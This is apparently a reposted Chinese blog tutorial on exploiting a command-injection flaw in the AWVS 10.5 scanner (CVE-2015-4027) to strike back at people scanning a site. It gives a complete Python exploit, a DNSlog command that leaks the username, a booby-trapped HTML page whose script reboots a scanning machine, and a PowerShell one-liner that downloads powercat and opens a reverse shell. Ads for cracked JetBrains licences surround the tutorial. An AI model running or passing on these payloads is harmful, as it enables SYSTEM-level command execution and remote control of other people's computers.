awvs原理_csgo奇葩武器代码

awvs原理_csgo奇葩武器代码awvs10.5下载http://www.32r.com/soft/12986.html

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

目录

awvs10.5安装

命令执行

进一步利用

重启系统

反弹shell


首先,在渗透的时候,很多人会开各种扫描器收集一波信息,在国内用的最多最平常的扫描器应该是AWVS系列。这篇文章写得就是利用AWVS的一个漏洞去反制攻击者,仅提供一个思路进行参考。

这里利用的是AWVS 10被爆出一个本地权限提升漏洞(CVE-2015-4027),漏洞详情及POC:https://www.exploit-db.com/exploits/38847/

  • 实验系统:win7 sp1
  • awvs:10.5

awvs10.5安装

首先我们先下载awvs 10.5,参考:http://www.32r.com/soft/12986.html

漏洞分析

漏洞是出现在AWVS 10 的一个任务调度的API上。在AWVS 10.x 被安装后,系统会默认安装一个叫做“AcuWVSSchedulerv10”的自启动服务,这个服务是跑在system权限下的。他会监听本地的8183端口,用户可以通过它直接调用接口来给awvs添加新的扫描任务。

如下图所示,通过访问http://127.0.0.1:8183即可完成扫描任务的添加删除和进度查看。

awvs原理_csgo奇葩武器代码

在添加任务时,参数里有一项为reporttemplate ,他的作用是选择扫描结束生成报告时所用的模板,研究发现这个参数会被带入WVS的命令行执行。由于系统没有对用户的输入做检查,导致我们可以通过reporttemplate带入任意的参数,形成了命令注入。

通过查看awvs的官方文档:https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/

发现wvs命令行下有一个参数为/run,通过它可以执行系统任意命令。因此我们可以使用这个参数获得一个system权限的命令执行。

这里我对原poc进行一个修改,修改为python3

#import httplib
import requests
import json
from datetime import datetime
import sys
import os
from time import gmtime, strftime
url = "http://127.0.0.1:8183/api/addScan"


if len(sys.argv) > 1:
    COMMAND = sys.argv[1] 
    pass
else:
    print('请输入想要执行的命令参数: python xx.py "command"')
    os._exit(0)
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
    }
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\"" 
ACUDATA = {"scanType":"scan",
           "targetList":"",
           "target":["http://"+"A"*2048],
           "recurse":"-1",
           "date":strftime("%m/%d/%Y", gmtime()),
           "dayOfWeek":"1",
           "dayOfMonth":"1",
           "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
           "deleteAfterCompletion":"False",
           "params":{"profile":"Default",
                     "loginSeq":"<none>",
                     "settings":"Default",
                     "scanningmode":"heuristic",
                     "excludedhours":"<none>",
                     "savetodatabase":"True",
                     "savelogs":"False",
                     "generatereport":"False",
                     "reportformat":"PDF",
                     "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
                     "emailaddress":""}
           }

def sendExploit():
    """conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
                conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
                resp = conn.getresponse()
                return "%s %s" % (resp.status, resp.reason)"""
    re = requests.post(url=url,headers=ACUHEADERS,data=json.dumps(ACUDATA))
    print(re.status_code,re.text)
print ("Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n")
print ("[+] Command : %s will be executed as SYSTEM" % COMMAND)
print ("[+] Sending exploit...")
sendExploit()
print ("[+] Done!")

这个payload其实就是模仿的一个添加任务的一个请求,这里可以使用proxychains对poc进行流量的截取查看

awvs原理_csgo奇葩武器代码

命令执行

我们把这个poc进行执行

1. DNSlog探测

首先在dnslog平台获取一个子域,http://www.dnslog.cn/

执行python脚本,我们发现此时立即添加了一个扫描任务,任务是在一分钟后执行

awvs原理_csgo奇葩武器代码

一分钟后刷新dnslog,发现命令被执行了 

awvs原理_csgo奇葩武器代码

2.dnslog回显系统信息

dnslog结合Windows系统变量回显系统信息

python 1.py "ping %USERNAME%.8mszqz.dnslog.cn"

awvs原理_csgo奇葩武器代码

 

进一步利用

然后思考,可不可以在网页中写入js代码,然后js中放入我们的poc,将poc用js的方式进行提交。这里将原作者的js代码进行一个修改,因为我用其提供的js代码并不能执行成功,修改的js代码如下。写先一个简单的HTML页面

重启系统

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>钓鱼网站</title>
    <h1>嗨喽,欢迎来到到我的世界</h1>
</head>
<body>
    <script> 
		var time = new Date()
		var y = time.getFullYear();
		var m = time.getMonth()+1;
		var d = time.getDate();
		var hours = time.getHours();
		var min = time.getMinutes()+1;
		//var command = "shutdown -r -t 0";
		var padding = "http://";
		for(i=0;i<2048;i++)padding+="a";
		var exp = '{"scanType":"scan","targetList":"","target":["'+padding+'"],"recurse":"-1","date":"'+m+'/'+d+'/'+y+'","dayOfWeek":"1","dayOfMonth":"1","time":"'+hours+':'+min+'","deleteAfterCompletion":"False","params":{"profile":"Default","loginSeq":"<none>","settings":"Default","scanningmode":"heuristic","excludedhours":"<none>","savetodatabase":"True","savelogs":"False","generatereport":"False","reportformat":"PDF","reporttemplate":"WVSDeveloperReport.rep /Crawl http://www.google.it /Run \\"shutdown /r /t 0 \\"","emailaddress":""}}'
		document.write(exp)
		var xmlhttp;
		if(window.XMLHttpRequest){
		  xmlhttp = new XMLHttpRequest();
		  }else{
		  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
		  }
		  xmlhttp.open("POST","http://127.0.0.1:8183/api/addScan",true);
		  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
		  xmlhttp.setRequestHeader("RequestValidated","true");
		  xmlhttp.send(exp);

	</script>
</body>
</html>

用pyhthon起一个web服务

python -m http.server 80

awvs原理_csgo奇葩武器代码

shutdown /r /t 0,就是我们执行的系统命令

然后,当我们使用扫描器对网站进行扫描的时候,一扫描发现,系统自动添加了一个扫描任务

awvs原理_csgo奇葩武器代码

当任务执行的时候,攻击者的系统重启了~~

awvs原理_csgo奇葩武器代码

当然还可以进行添加账号等一些操作。

反弹shell

ps的执行策略

默认不允许运行ps脚本

四种策略

  • Restricted 默认,不允许执行脚本(管理员也不行)
  • ALLsigned 允许云心经过证书验证的脚本
  • Unrestricted 允许执行任意脚本
  • RemoteSigned 本地脚本不限制,来自网络的脚本需要经过签名
Get-Executionpolicy              看脚本运行策略 
Set-Executionpolicy Unrestricted  更改脚本策略为Unrestricted

因为是winndows下,所以并不好反弹shell,这里想的是利用powershell脚本进行反弹

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd

但是放到poc里面去,并不会执行这个命令,不知道啥原因~~

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/190629.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • c语言图书管理系统源代码_c语言图书信息管理系统

    c语言图书管理系统源代码_c语言图书信息管理系统一、目的通过设计一个图书管理系统的程序,全面运用课程的主要知识点,巩固对模块化程序设计、文件操作的理解,提高软件编程能力。二、涉及的知识点循环、分支语句、函数、数组、函数、结构体、指针、链表、文件读取操作等等三、程序已经实现的功能点(用100-200字进行说明)(1)程序具有以下功能,操作流程见下图:登录界面:输入用户名(admin)、密码(20190611),只有用户名、密码同时正确(信息存放在文件中)才能进入系统主菜单,否则需要重新输入用户名、密码。(同时输入3次错误将退出程序)。操

    2022年10月11日
  • C++ ^按位异或运算符

    C++ ^按位异或运算符参与运算的两个值,如果两个相应位相同,则结果为0,否则为1。即:0^0=0,1^0=1,0^1=1,1^1=0

  • python pandas fillna_python rfind函数

    python pandas fillna_python rfind函数本文概述我们可以使用fillna()函数填充数据集中的空值。句法DataFrame.fillna(value=None,method=None,axis=None,inplace=False,limit=None,downcast=None,**kwargs)参数值:它是一个用于填充空值的值,或者是一个Series/dict/DataFrame。method:一种用于填充重新…

  • idea查看接口方法的实现方法_jsp接口实现类

    idea查看接口方法的实现方法_jsp接口实现类1.查找接口的实现类:Ctrl+H2.跳转到指定方法的接口:Ctrl+鼠标左键输入快捷键+点击之后跳转至下图3.跳转到指定方法的接口的实现类:Ctrl+Alt+鼠标左键输入快捷键+点击之后跳转至下图……

  • SQL 语句练习

    实验名称SQL语句练习实验地点实验楼502实验日期3.21 一、实验目的及要求 1.加深对表间关系的理解 2.理解数据库中数据的查询方法和应用 3.掌握各种查询的异同及相互之间的转换方法 4.掌握各种查询要求的实现 二、实验环境 Sql…

  • 数据挖掘——关联规则挖掘

    数据挖掘——关联规则挖掘《数据挖掘》国防科技大学《数据挖掘》青岛大学数据挖掘之关联规则挖掘关联规则挖掘(AssociationRuleMining)最早是由Agrawal等人提出。最初的动机是解决购物篮分析(BasketAnalysis)问题,目的是发现交易数据库(TransactionDatabase)中不同商品之间的联系规则。定义关联规则是描述在一个交易中物品之间同时出现的规律的知识模式,更确切的说,关联规则是通过量化的数字描述物品X的出现对物品Y的出现有多大的影响。关联分析associationana

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号